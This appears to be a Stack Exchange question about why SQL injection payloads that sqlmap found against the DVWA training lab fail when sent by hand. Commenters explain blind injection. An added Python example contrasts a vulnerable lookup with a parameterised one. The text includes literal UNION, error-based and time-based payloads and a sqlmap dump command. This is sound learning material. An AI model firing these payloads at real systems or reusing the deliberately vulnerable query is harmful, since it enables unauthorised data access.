
I was trying out SQLMAP on DVWA (medium security for SQL injection), and I did get a set of payloads (sqlmap chucked out a few payloads that should have worked). But entered manually, I couldn't get the payloads to work. If I let sqlmap do the job, then it works. Can anyone tell me why this is so?

sqlmap -r data.txt -p id --dump

Parameter: id (POST)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: id=(SELECT (CASE WHEN (5617=5617) THEN 2 ELSE (SELECT 4209 UNION SELECT 4715) END))&Submit=Submit

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=2 AND (SELECT 2425 FROM(SELECT COUNT(*),CONCAT(0x71706b6a71,(SELECT (ELT(2425=2425,1))),0x7162707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&Submit=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=2 AND (SELECT 7889 FROM (SELECT(SLEEP(5)))jSfl)&Submit=Submit

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: id=2 UNION ALL SELECT NULL,CONCAT(0x71706b6a71,0x45596866446d6f486b5771515972717242497377544549685a437141704441774e504266424d4e56,0x7162707171)-- -&Submit=Submit

What I did: I put each payload, for example

-- id=2 UNION ALL SELECT NULL,CONCAT(0x71706b6a71,0x45596866446d6f486b5771515972717242497377544549685a437141704441774e504266424d4e56,0x7162707171)-- -&Submit=Submit -- 

into the form data on dev tools, and I don't get a response at all.

What I expected: I expected the database to show up, like when you put ' or '1'='1 into the low-security DVWA and you get into the database. I figured that if you put the payload generated by sqlmap into the form data and send the request over dev tools, the database should be visible.

What am I missing here?

  • "It didn't work" doesn't give us much to work with. What actually happens? How are you doing it manually? Whenever asking for troubleshooting help, always include what works, what doesn't, what the output is, and what you expect the output to be. – schroeder Jan 05 '22 at 18:01
  • Suggestion: use Wireshark to capture traffic, and compare your requests with those generated by SqlMap. – Kate Jan 05 '22 at 19:26
  • Uh, that query you say that you used? That's for a ***blind injection*** according to sqlmap. You literally won't see anything. Did you try the other queries? "and then you get the database" -- no, that's not how this works. Does anything in that query look like it would return a database? – schroeder Jan 07 '22 at 13:30
  • But it's a payload, isn't it? When sqlmap finds those payloads, it then asks "do you want to inject them", and we say yes, and it chucks out the database. How come? Sorry if this sounds a little stupid, but I'm new. – kellyr Jan 08 '22 at 17:08
  • @kellyr It sounds like you need to learn what blind injection is. This is also why I *highly recommend* **not** to start with automated tools like SQLmap, as you don't learn anything and have the tool do all the work for you. – Jan 08 '22 at 17:09
  • Those are proof of concept payloads that result in success. They are not magic "dump the database" strings. Use those payloads well, and know how to manipulate them, and you can copy what sqlmap does. I ***highly*** suggest that you run sqlmap in highly verbose mode to see how SQLmap uses its payloads. – schroeder Jan 09 '22 at 01:15
  • OK, I will run it in highly verbose mode. Thanks. – kellyr Jan 09 '22 at 18:03
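An added illustration of the point made in the comments above; it is not code from the question or from DVWA. A boolean-based blind payload only changes whether the normal row comes back, so a true condition looks exactly like the unmodified page and no database contents appear, while a parameterised query treats the same input as data. It uses an in-memory SQLite table with constructed rows standing in for DVWA's MySQL users table; the table and column names are assumptions.

```python
import sqlite3

# Constructed sample rows standing in for DVWA's users table (assumed schema).
ROWS = [(1, "admin", "admin"), (2, "Gordon", "Brown"), (3, "Hack", "Me")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", ROWS)
    return conn


def vulnerable_lookup(conn, user_id):
    """Numeric id concatenated into the query unquoted, so the input is parsed as SQL."""
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = {user_id}"
    return conn.execute(sql).fetchall()


def safe_lookup(conn, user_id):
    """Hardened form: validate the type, then bind the value as a parameter."""
    try:
        uid = int(user_id)
    except ValueError:
        return []  # "2 AND (1=1)" is not an integer, so it is rejected outright
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(sql, (uid,)).fetchall()


def blind_probe(conn, condition):
    """Boolean-based blind: the only observable signal is row-or-no-row.

    A true condition returns the same row as a plain id=2 request, which is why
    a blind payload shows nothing new on the page; it answers one yes/no question.
    """
    return bool(vulnerable_lookup(conn, f"2 AND ({condition})"))


if __name__ == "__main__":
    db = make_db()
    print("plain id=2          :", vulnerable_lookup(db, "2"))
    print("id=2 AND (1=1)      :", vulnerable_lookup(db, "2 AND (1=1)"))  # identical page
    print("id=2 AND (1=2)      :", vulnerable_lookup(db, "2 AND (1=2)"))  # empty page
    print("oracle: 3 users?    :", blind_probe(db, "(SELECT COUNT(*) FROM users) = 3"))
    print("parameterised query :", safe_lookup(db, "2 AND (1=1)"))       # rejected
```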

0 Answers